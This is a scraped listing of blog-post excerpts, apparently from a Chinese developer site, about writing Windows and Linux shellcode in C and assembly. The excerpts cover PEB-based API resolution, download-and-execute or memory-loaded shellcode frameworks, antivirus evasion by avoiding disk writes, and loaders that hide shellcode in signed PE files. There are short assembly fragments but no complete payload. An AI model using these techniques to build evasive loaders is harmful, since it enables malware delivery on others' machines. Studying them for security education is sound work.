05-14 2532
我最近做了个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。
1.8 运用C编写ShellCode代码
LYSHARK
07-13 6158
在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,在多数情况下读者可以直接使用C开发,只有某些环境下对ShellCode条件有极为苛刻的长度限制时才会考虑使用汇编。
使用C编译器编写shellcode
Tody Guo的专栏
12-08 1821
原文出处: Nick Harbour   译文出处: IDF徐文博 背景 有时候程序员们需要写段独立于位置操作的代码,可当作段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代码仅能靠它自己,作者无法使用现代软件开发的实践来推
SublimeText-Nodejs:10个高效Node.js开发技巧,让你的Sublime Text 3更强大
最新发布
gitblog_00012的博客
05-24 506
SublimeText-Nodejs 是个专为 Sublime Text 3 设计的 Node.js 开发插件,它为 JavaScript 开发者提供了套完整的开发工具链。这个插件集成了代码自动补全、快速运行脚本、调试功能、NPM 命令管理和实用的代码片段,让您在 Sublime Text 3 中享受流畅的 Node.js 开发体验。🚀 ## ✨ 为什么选择 SublimeText-Nod
C/C++ 通用ShellCode编写与调用
热门推荐
LYSHARK
09-23 1万+
首先,我们的ShellCode代码需要自定位,因为我们的代码并不是个完整的EXE可执行程序,他没有导入表无法定位到当前系统中每个函数的虚拟地址,所以我们直接获取到Kernel32.dll的基地址,里面的GetProcAddr这个函数,获取的方式有很多,第种是暴力搜索,第二种通过遍历进程的TEB结构来实现,我们使用第二种方式尝试,旦获取到该函数,就可以动态的调用任何想要的函数了。
使用C语言编写通用shellcode的程序
TYJJXSJ的专栏
01-29 2401
/*   使用C语言编写通用shellcode的程序   出处:internet   修改:Hume/冷雨飘心   测试:Win2K SP4 Local   */    #include    #include    #include    #define  DEBUG 1    //    //函数原型    //    void    
c语言实现shellcode转换工具
17岁boy的博客
07-12 3207
shellcode种小型内嵌代码,般用于入侵,和修补漏洞的。 这种代码是非常简洁的而且跨平台性能高,因为后面博主要写关于shellcode的文章,所以今天这里给大家介绍如何使用c语言个能够实现汇编到机器码的转换程序 首先你需要个汇编解释器: 这里博主已经上传到网盘: 链接:https://pan.baidu.com/s/1TuF1OeBJzAwcwVrlR4d4BQ​​​​​​...
SigLoader使用教程:解密SigFlip修改后的PE文件中的shellcode
gitblog_00308的博客
03-10 929
SigLoader是SigFlip项目生态中的重要组件,专门用于加载经过SigFlip工具修改的PE文件(如exe、dll、sys等),并安全解密其中隐藏的shellcode。本教程将详细介绍如何使用SigLoader完成从文件加载到shellcode执行的全过程,帮助新手快速掌握这实用工具的核心功能。 ## 📋 准备工作:获取与编译SigLoader ### 1. 克隆项目仓库 首先需要
C语言实现shellcode通用框架二:文件下载执行或内存加载
yan_star的博客
01-21 1468
简介: 承接接上篇。上篇(C语言实现shellcode通用框架解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了些,代码量有所变大,但是核心思想,代码逻辑还是样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使
0基础写shellcode加载器
qq_60870726的博客
11-12 2947
从0开始了解shellcode 和加载器
shellcode样本—弹出MessageBox
谈成(C/C++)
04-26 1230
shellcode段可独立运行的汇编代码,常出现在漏洞利用中。当我们利用漏洞控制了eip后,就需要shellcode执行我们想要做的任何事。 shellcode用到的api都是通过动态加载而来的,可以通过fs:[30h]找到PEB中的Ldr结构。在Ldr中记录有dll加载链,从而找到Kernel32。然后通过LoadLibraryA加载任何你想要加载的dll模块。 所有API均通过dll中的EAT导出表查询获得。以下面就是个用来生成弹出MessageBox的shellcode样本,可以用来测试漏洞利
汇编语言编写shellcode实现弹窗计算器
yeanhoo的博客
04-04 2264
使用汇编语言编写shellcode,调用WinExec实现弹出计算器,汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
PE感染&ShellCode编写技术补充
Less Is More
05-28 3392
标 题: PE感染&ShellCode编写技术补充 时 间: 2013-06-04,22:45:53    上篇文章写了Windows Shell Code编写些技术和经验,其中讲到ShellCode中使用的数据的问题时,提供了三种方法: 1. HardCode地址,然后把数据写入HardCode的地址中 2. 转化法(HASH),把数据转化成可用寄存器存储的整数 3. 把数据Pu
C/C++ 实现ShellCode编写与提取
LYSHARK
07-16 1万+
简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在转换成 shellcode 时就会出错!简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。这就是我们需要的 ShellCode 了 (o゚v゚)ノ。
运用C编写ShellCode代码教程
高性价比服务器就选:蓝易云
08-12 591
以上是个简单的教程,介绍了使用C语言编写ShellCode的基本步骤。由于ShellCode的复杂性和潜在的危险性,建议只在合法和授权的环境中进行相关实验和研究。请谨慎行事,并确保你对相关技术和法律的了解。需要注意的是,编写和使用ShellCode涉及到计算机安全的领域,需要遵循合法和道德的原则。在进行ShellCode开发和使用之前,请确保你有合适的授权和法律许可,并遵守相关法律和规定。编写ShellCode项高级技术,需要深入了解计算机体系结构和操作系统底层原理。
黑客攻防入门(二)shellcode构造
不断攀登
07-28 1万+
1. 概说shell我们都知道是什么了吧! 狭义的shellcode 就是段可以运行shell的代码!构造shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。shellcode通常放在缓冲区内,也可以通过环境变量存入堆内,也可以通过动态内存放入堆区。下面我们学习下怎样构造shellcode。 注意: 我是在Centos 64位的系统下进行测试和构
第10章 shellcode实战:13 第二种shellcode编写实战(2)
李小咖·网安技术库
05-12 784
在类CDoShellcode中,将所有函数功能执行的参数都传递个CAPI的指针变量,那么所有功能都可以使用CAPI中的函数。如此来,对类CDoShellcode而言,我们只关注功能的实现,不必再顾及函数动态调用的问题。所有用到的动态函数的实现都可以共享CAPI中的实现。的基础上,新增加个CAPI类,将所有用到的函数都在这个类中做动态调用的处理,这样使得整个shellcode功能结构更加清晰。
演示几种用c语言执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 978
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: leng_que@yahoo.com.cn* 描述: 演示几种用C语言执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///段打开Windo...
linux c语言shellcode,二进制入门-打造Linux shellcode基础篇
weixin_42412939的博客
05-12 725
0x01 前言本文的目的不是为了介绍如何进行恶意的破坏性活动,而是为了教会你如何去防御此类破坏性活动,以帮助你扩大知识范围,完善自己的技能,如有读者运用本文所学技术从事破坏性活动,本人概不负责。0x02 什么是Shellcodeshellcode是用作利用软件漏洞的有效载荷的小段代码,因为它通常启动个命令shell,攻击者可以从中控制受攻击的机器,所以称他为shellcode。但是任何执行类似...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值